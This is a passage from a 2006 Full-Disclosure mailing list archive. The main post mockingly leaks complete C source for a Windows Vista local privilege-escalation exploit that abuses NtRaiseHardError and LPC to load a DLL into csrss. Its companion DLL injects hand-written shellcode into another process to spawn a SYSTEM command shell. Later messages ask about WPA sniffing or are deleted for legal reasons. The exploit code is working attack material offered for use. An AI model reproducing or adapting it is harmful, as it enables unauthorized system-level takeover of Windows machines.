                 (__)\       )\/\
                     ||----w |
                     ||     ||





Concerned about your privacy? Instantly send FREE secure email, no account required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485



From soundoftheunderground at hush.com  Sun Dec 31 22:55:59 2006
From: soundoftheunderground at hush.com (soundoftheunderground at hush.com)
Date: Sun, 31 Dec 2006 16:55:59 -0600
Subject: [Full-disclosure] LOL VISTA EXPL0IT WAREZ LOL
Message-ID: <20061231225559.56C17DA81F@mailserver7.hushmail.com>

-+- 0D4Y XCL00S1V3 -+- D0n7 0P3N T1LL XM4S -+- 0D4Y XCL00S1V3 -+-

Introducing The Latest In Purloin3d Pr1v4t3 Pr0gg13z, Sn4tch3d 
S3kr1t Sh3llc0d3z & F1lch3d Furt1v3 F1l3z

All new private^H^H^H^H^H^H^Hpublic exploit for a well known Vista 
hole.

We warmly acknowledge erasmus for his generous and noble and 
unintentioned donation.

Regrettably we award NO points for style but maximum points for 
effort and fair marks for dependability and timeliness.  May 
Providence guide this happy coder to continue to ignore women and 
find comfort in his ugly, ugly, code.
+++



//raise.c
//26-12-2006 ]erasmus[/ORC
//exploit NtRaiseHardError privesc and load dll into csrss
//this version only is vista, other version can be worked
//with proper offsets, i will complete them soon
//imperfect but sometime work, ok for proto type;)
//dll limit to 8 chars but maybe can work around by
//\xxx\..\dll type trick and use LoadLibraryW, now is
//C:\TEST but another drive maybe work
#define offs1 0x30
#define offs2 0xBBD0
#include "windows.h"
#include "stdio.h"
DWORD(WINAPI*NtConnectPort)(PHANDLE,PWORD,
PSECURITY_QUALITY_OF_SERVICE,PDWORD,PDWORD,PDWORD,PVOID,
PDWORD);
DWORD(WINAPI*NtQueryInformationProcess)(HANDLE,DWORD,PVOID,
DWORD,PDWORD);
DWORD(WINAPI*NtRaiseHardError)(DWORD,DWORD,DWORD,PVOID*,
DWORD,PDWORD);
HANDLE hl;
HANDLE hs;
DWORD sb;
LPVOID lpc(LPCWSTR w){//cesar trick
WORD n[4];
SECURITY_QUALITY_OF_SERVICE q;
LPVOID p;
DWORD d;
DWORD c[6],s[3];
BYTE b[0x28];
n[0]=n[1]=wcslen(w)*2;
*(PDWORD)(n+2)=(DWORD)w;
memset(&q,0,sizeof(q));
q.Length=sizeof(q);
p=NULL;
d=0x1000;
memset(&c,0,sizeof(c));
c[0]=sizeof(c);
memset(&s,0,sizeof(s));
s[0]=sizeof(s);
memset(&b,0,sizeof(b));
b[1]=1;
hs=CreateFileMapping(INVALID_HANDLE_VALUE,NULL,
PAGE_READWRITE,0,d,NULL);
if(!hs)return NULL;
p=MapViewOfFile(hs,FILE_MAP_ALL_ACCESS,0,0,0);
if(!p)return NULL;
c[1]=(DWORD)hs;
c[3]=d;
c[4]=(DWORD)p;
d=sizeof(b);
if(NtConnectPort(&hl,n,&q,c,s,NULL,&b,&d))
return NULL;
sb=c[5];
return p;
}

HANDLE e1,e11;
DWORD WINAPI tp1(LPVOID a){
LPVOID p[7];
DWORD d;
p[0]=p+3;
p[1]=p+5;
p[2]=0;
p[3]=(LPVOID)0x1B001AE;
p[4]=L"\\??\\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
p[5]=(LPVOID)0x100010;
p[6]=L"erasmus1";
while(1){
WaitForSingleObject(e1,INFINITE);
NtRaiseHardError(0x40000018,3,3,p,0,&d);
SetEvent(e11);
}
return 0;
}

DWORD aaa,bbb;
HANDLE e2,e22;
DWORD WINAPI tp2(LPVOID a){
BYTE b[0xD8];
LPVOID p[7];
DWORD d;
memset(&b,0,sizeof(b));
*(PDWORD)(b+0x3C)=2;
*(PDWORD)(b+0x48)=1;
*(PDWORD)(b+0x4C)=1;
p[0]=p+3;
p[1]=p+5;
p[2]=0;
p[3]=(LPVOID)0xD600D6;
p[4]=&b;
p[5]=(LPVOID)0x100010;
p[6]=L"erasmus2";
while(1){
WaitForSingleObject(e2,INFINITE);
memcpy(&b,"C:\\TEST",8);
*(PDWORD)(b+0x08)=aaa;
*(PDWORD)(b+0x0C)=bbb;
*(PDWORD)(b+0x70)=aaa+0x100;
*(PDWORD)(b+0x74)=aaa+0x100;
NtRaiseHardError(0x40000018,3,3,p,0,&d);
SetEvent(e22);
}
return 0;
}

STARTUPINFO cps;
PROCESS_INFORMATION cpi;
void w(DWORD a,DWORD d){
HWND h;
aaa=d;
bbb=a;
SetEvent(e1);
do{h=FindWindow(NULL,"erasmus1");}while(!h);
CreateProcess(NULL,"notepad",NULL,NULL,0,0,NULL,NULL,&cps,
&cpi);
Sleep(100);
SendMessage(h,WM_CLOSE,0,0);
Sleep(100);
SetEvent(e2);
do{h=FindWindow(NULL,"erasmus2");}while(!h);
TerminateThread(cpi.hThread,0);
Sleep(100);
CreateProcess(NULL,"notepad",NULL,NULL,0,0,NULL,NULL,&cps,
&cpi);
Sleep(100);
SendMessage(h,WM_CLOSE,0,0);
Sleep(100);
}

int main(int c,char**v){
char sd[MAX_PATH];
char dp[MAX_PATH];
WCHAR pp[MAX_PATH];
WCHAR pn[MAX_PATH];
HMODULE nt,kr,ad;
DWORD se,cs,ws,u,d,h;
HANDLE t;
LPBYTE sc;
GetSystemDirectory(sd,sizeof(sd));
sprintf(dp,"%s\\csrsrv.dll",sd);
cs=(DWORD)LoadLibrary(dp);
sprintf(dp,"%s\\winsrv.dll",sd);
ws=(DWORD)LoadLibrary(dp);
sprintf(dp,"%s\\ntdll.dll",sd);
nt=LoadLibrary(dp);
sprintf(dp,"%s\\kernel32.dll",sd);
kr=LoadLibrary(dp);
sprintf(dp,"%s\\advapi32.dll",sd);
ad=LoadLibrary(dp);
*(LPVOID*)&NtConnectPort=GetProcAddress(nt,"NtConnectPort");
*(LPVOID*)&NtQueryInformationProcess=GetProcAddress(nt,
"NtQueryInformationProcess");
*(LPVOID*)&NtRaiseHardError=GetProcAddress(nt,
"NtRaiseHardError");
if(2==c){
d=atoi(v[1]);
if(!d){
printf("no args need\n");
return -1;
}
t=OpenProcess(PROCESS_ALL_ACCESS,0,d);
if(!t){
printf("no args need\n");
return -1;
}
__asm mov eax,fs:[0x18]
__asm mov eax,[eax+0x30]
__asm mov eax,[eax+0x1D4]
__asm mov se,eax
if(se)swprintf(pp,L"\\Sessions\\%d\\Windows",se);
else swprintf(pp,L"\\Windows");
swprintf(pn,L"%s\\ApiPort",pp);
sc=(LPBYTE)lpc(pn);
swprintf(pn,L"%s\\SbApiPort",pp);
if(!sc)sc=(LPBYTE)lpc(pn);
if(!sc)return -1;
h=0;
DuplicateHandle(GetCurrentProcess(),hs,t,(LPHANDLE)&h,0,0,2);
WriteProcessMemory(t,&hs,&h,4,&d);
WriteProcessMemory(t,&sb,&sb,4,&d);
Sleep(INFINITE);
}else{
STARTUPINFO cps;
PROCESS_INFORMATION cpi;
hs=sc=NULL;
sb=0;
memset(&cps,0,sizeof(cps));
cps.cb=sizeof(cps);
cps.dwFlags=STARTF_USESHOWWINDOW;
sprintf(sd,"\"%s\" %d",v[0],GetCurrentProcessId());
if(!CreateProcess(NULL,sd,NULL,NULL,0,
CREATE_NEW_PROCESS_GROUP|CREATE_NEW_CONSOLE,NULL,NULL,&cps,
&cpi)){
printf("spawn fail\n");
return -1;
}
Sleep(3000);
if(!hs){
printf("lpc fail\n");
return -1;
}
sc=(LPBYTE)MapViewOfFile(hs,FILE_MAP_ALL_ACCESS,0,0,0);
}
memset(&cps,0,sizeof(cps));
cps.cb=sizeof(cps);
cps.dwFlags=STARTF_USESHOWWINDOW;
e1=CreateEvent(NULL,0,0,NULL);
e11=CreateEvent(NULL,0,0,NULL);
CreateThread(NULL,0,tp1,NULL,0,NULL);
e2=CreateEvent(NULL,0,0,NULL);
e22=CreateEvent(NULL,0,0,NULL);
CreateThread(NULL,0,tp2,NULL,0,NULL);
u=cs+offs2;
*(PDWORD)(sc+offs1)=(DWORD)GetProcAddress(kr,"LoadLibraryA");
w(u,sb);
Sleep(INFINITE);
return 0;
}



//test.c
//26-12-2006 ]erasmus[/ORC
//dll for load in csrss by raise.c
//repair csrss and create OWNED.TXT and try create system cmd
//i can exec shell code in lpc shared section but LoadLibrary
//is for work around of DEP on vista
//also imperfect but also is proto type!
//offsets is for vista
#define offs1 0x5F89
#define offs2 0xBBD0
#define offs3 0xBBFC
#define offs4 0x3F0CC
#include "windows.h"
LONG WINAPI uef(LPEXCEPTION_POINTERS a){
Sleep(INFINITE);
return 0;
}

DWORD WINAPI tp(LPVOID a){
HMODULE kr,ws;
BYTE b[0x100];
DWORD c,d;
HANDLE h,t;
kr=GetModuleHandle("kernel32");
ws=GetModuleHandle("winsrv");
h=OpenProcess(PROCESS_ALL_ACCESS,0,*(LPDWORD)((DWORD)ws+offs4));
c=(DWORD)VirtualAllocEx((HANDLE)h,NULL,sizeof(b),MEM_COMMIT,PAGE_EXE
CUTE_READWRITE);
d=(DWORD)GetProcAddress(kr,"CreateProcessA")-(c+69);
memcpy(b,"\x33\xC0\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x
50\x50\xE8\x10\x00\x00\x00\x57\x69\x6E\x53\x74\x61\x30\x5C\x44\x65\x
66\x61\x75\x6C\x74\x00\x50\x6A\x44\x8B\xCC\x68\x63\x6D\x64\x00\x50\x
50\x50\x50\x54\x51\x50\x50\x50\x50\x50\x50\x83\xC1\xFC\x51\x50\xE8\x
00\x00\x00\x00\x83\xC4\x58\xC3",73);
*(LPDWORD)(b+65)=d;
WriteProcessMemory((HANDLE)h,(LPVOID)c,b,sizeof(b),&d);
t=CreateRemoteThread((HANDLE)h,NULL,0,(LPTHREAD_START_ROUTINE)c,NULL
,0,NULL);
WaitForSingleObject(t,INFINITE);
return 0;
}

BOOL WINAPI DllMain(HANDLE a,DWORD dwReason,LPVOID c){
DWORD cs,d;
LPDWORD p,f,l;
HANDLE h;
if(DLL_PROCESS_ATTACH==dwReason){
SetUnhandledExceptionFilter(uef);
h=CreateFile("C:\\OWNED.TXT",GENERIC_WRITE,0,NULL,
CREATE_ALWAYS,FILE_FLAG_WRITE_THROUGH,NULL);
WriteFile(h,"greetz from csrss!\r\n",20,&d,NULL);
CloseHandle(h);
cs=(DWORD)GetModuleHandle("csrsrv");
*(LPDWORD)(cs+offs2)=0;
__asm mov eax,esp
__asm mov p,eax
while(1){
if(cs+offs1==*p){
*p=(DWORD)ExitThread;
d=p[1]+8;
break;
}
p=p+1;
}
p=*(LPDWORD*)(cs+offs3)+2;
f=p;
while(d!=f[0])f=*(LPDWORD*)f;
l=p;
while(d!=l[1])l=*(LPDWORD*)(l+1);
*(LPDWORD*)f=l;
*(LPDWORD*)(l+1)=f;
for(d=0;d<100;d=d+1){
p=(LPDWORD)HeapAlloc(GetProcessHeap(),0,0xD8);
memset(p,0,0xD8);
p[2]=(DWORD)p+0x08;
p[3]=(DWORD)p+0x08;
p[4]=(DWORD)p+0x10;
p[5]=(DWORD)p+0x10;
p[13]=0x240000;
p[15]=1;
p[16]=1;
p[28]=(DWORD)p+0x78;
p[29]=(DWORD)p+0x80;
}
p=(LPDWORD)GetProcessHeap();
while(1){
p=p+1;
if(0x60005==*p&&p[1]>(DWORD)p&&p[1]<(DWORD)p+0x100&&
!strcmp(*(LPSTR*)(p+1),"CSRSS")){
d=p[1]+6;
while(1){
p=p-1;
if(d-(DWORD)p==*p)break;
}
break;
}
}
*(LPDWORD*)(cs+offs2)=p;
Sleep(0);
CreateThread(NULL,0,tp,NULL,0,NULL);
}
return TRUE;
}




Concerned about your privacy? Instantly send FREE secure email, no account required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485



From exceed at email.si  Sun Dec 31 23:42:42 2006
From: exceed at email.si (/dev/null)
Date: Mon, 01 Jan 2007 00:42:42 +0100
Subject: [Full-disclosure] Authenticated users can sniff WPA traffic?
Message-ID: <20061231234244.063F58B87F@www1.email.si>

Hi list,

recently I came across this link:
http://seclists.org/pen-test/2005/Nov/0073.html

Basicaly, it states that authenticated users, in combination with ARP 
poisoning, can sniff WPA traffic. Can anybody confirm this is possible? If 
that's true, is there any way to prevent this?

I would really appreciate any info/link/paper regarding topic.

Thank you very much and happy new year...

/ex.

____________________
http://www.email.si/



From halturnerchansechorselol at yahoo.com  Sat Dec 23 04:37:28 2006
From: halturnerchansechorselol at yahoo.com (Pedro Martinez)
Date: Fri, 22 Dec 2006 20:37:28 -0800 (PST)
Subject: [Full-disclosure] Harold C. Turner a.k.a. Hal Turner - Internet
	Radio Talk Show Host
Message-ID: <535933.14030.qm@web59005.mail.re1.yahoo.com>

[ The contents of this message have been deleted from the Full-Disclosure archive in response to a request of a legal nature. ] 


From nexisentertainment at gmail.com  Sat Dec 23 04:51:26 2006
From: nexisentertainment at gmail.com (Rob "Nexis" Nelson)
Date: Fri, 22 Dec 2006 20:51:26 -0800
Subject: [Full-disclosure] Harold C. Turner a.k.a. Hal Turner - Internet
 Radio Talk Show Host
In-Reply-To: <535933.14030.qm@web59005.mail.re1.yahoo.com>
References: <535933.14030.qm@web59005.mail.re1.yahoo.com>
Message-ID: <458CB5CE.5030003@gmail.com>

[ The contents of this message have been deleted from the Full-Disclosure archive in response to a request of a legal nature. ]
back